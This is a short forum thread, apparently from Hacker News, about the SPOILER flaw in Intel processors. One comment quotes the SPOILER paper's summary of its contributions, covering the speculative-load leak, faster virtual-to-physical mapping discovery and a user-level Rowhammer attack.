
Intel Processors Longtime Flawed - galaxyLogic
https://www.theregister.co.uk/2019/03/05/spoiler_intel_processor_flaw/
======
convivialdingo
From the paper:
[https://arxiv.org/pdf/1903.00446.pdf](https://arxiv.org/pdf/1903.00446.pdf)

1.1 Our Contribution

We have discovered a novel microarchitectural leakage which reveals critical
information about physical page mappings to user space processes. The leakage
can be exploited by a limited set of instructions, which is visible in all
Intel genera- tions starting from the 1st generation of Intel Core processors,
independent of the OS and also works from within virtual ma- chines and
sandboxed environments. In summary, this work:

1\. exposes a previously unknown microarchitectural leak- age stemming from
the false dependency hazards during speculative load operations.

2\. proposes an attack, SPOILER, to efficiently exploit this leakage to speed
up the reverse engineering of virtual-to- physical mappings by a factor of 256
from both native and JavaScript environments.

3\. demonstrates a novel eviction set search technique from JavaScript and
compares its reliability and efficiency to existing approaches.

4\. achieves efficient DRAM row conflicts and the first double-sided Rowhammer
attack with normal user-level privilege using the contiguous memory detection
capa- bility of SPOILER.

5\. explores how SPOILER can track nearby load operations from a more
privileged security domain right after a context switch.

